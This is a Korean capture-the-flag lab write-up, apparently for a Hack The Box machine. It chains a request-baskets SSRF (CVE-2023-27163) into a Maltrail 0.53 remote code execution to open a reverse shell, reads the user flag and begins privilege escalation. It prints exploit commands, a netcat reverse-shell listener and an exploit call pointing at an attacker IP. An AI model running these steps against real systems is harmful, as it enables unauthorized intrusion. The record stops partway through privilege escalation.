Proof of Concept
10.129.20.178
Nmap
PORT STATE SERVICE
22/tcp open ssh
55555/tcp open unknownInitial Access
http://10.129.20.178:5555 웹서비스 접속 후 소스코드에서 “request-baskets 1.2.1” 서비스 사용중인 것을 확인
request-baskets 1.2.1 서비스에서 SSRF 취약점 발견 (CVE-2023-27163)
Downloaded POC
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/madhavmehndiratta/CVE-2023-27163.git
Cloning into 'CVE-2023-27163'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.SSRF 취약점을 이용하여 내부에서만 접근 가능한 80포트로 접근할 수 있는 URL 생성
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ python CVE-2023-27163.py http://10.129.20.178:55555 http://127.0.0.1:80
Creating a proxy basket zbrrhb...
Basket Created!
Accessing the http://10.129.20.178:55555/zbrrhb makes the server request to http://127.0.0.1:80
Authorization Token: CkO85WLROyLkbbAfCgT-2lMqVfdS0W3DFPVliaXIggGI내부에서 접근 가능한 80포트에서 “maltrail 0.53” 서비스 사용 중인것을 확인
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ curl http://10.129.20.178:55555/zbrrhb
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<meta name="viewport" content="width=device-width, user-scalable=no">
<meta name="robots" content="noindex, nofollow">
<title>Maltrail</title>
<link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
<link rel="stylesheet" type="text/css" href="css/main.css">
<link rel="stylesheet" type="text/css" href="css/media.css">
<script type="text/javascript" src="js/errorhandler.js"></script>
<script type="text/javascript" src="js/thirdparty.min.js"></script>
<script type="text/javascript" src="js/papaparse.min.js"></script>
</head>
<body>
<div id="header_container" class="header noselect">
<div id="logo_container">
<SNIP
<div id="bottom_blank"></div>
<div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>
<ul class="custom-menu">
<li data-action="hide_threat">Hide threat</li>
<li data-action="report_false_positive">Report false positive</li>
</ul>
<script defer type="text/javascript" src="js/main.js"></script>
</body>
</html>Mailtrail 0.53 서비스에는 RCE 취약점이 존재
POC 다운로드
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/apaz-dev/Maltrail-v0.53-RCE.git
Cloning into 'Maltrail-v0.53-RCE'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 8), reused 9 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 6.13 KiB | 897.00 KiB/s, done.
Resolving deltas: 100% (8/8), done.4444 포트에 NC 리버스쉘 리스너 실행
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...POC 실행
┌──(kali㉿kali)-[~/Sau/Maltrail-v0.53-RCE]
└─$ ./exploit.sh -t http://10.129.20.178:55555/zbrrhb -i 10.10.14.17
[*] Start listen from ip 10.10.14.17 on port 4444리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.20.178] 59056
$Read user.txt
$ cat user.txt
cat user.txt
09fc6f298d333bdfa5448c1a0d37e917
$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:c1:1d brd ff:ff:ff:ff:ff:ff
inet 10.129.20.178/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2937sec preferred_lft 2937sec
inet6 dead:beef::250:56ff:feb0:c11d/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb0:c11d/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
sudo 권한 확인
puma@sau:~/.gnupg$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service/home/puma/.gnupg 디렉토리 확인
puma@sau:~/.gnupg$ ls -al
ls -al
total 20
drwx------ 3 puma puma 4096 Apr 15 2023 .
drwxr-xr-x 4 puma puma 4096 Jun 19 2023 ..
drwx------ 2 puma puma 4096 Apr 15 2023 private-keys-v1.d
-rw------- 1 puma puma 32 Apr 15 2023 pubring.kbx
-rw------- 1 puma puma 1200 Apr 15 2023 trustdb.gpg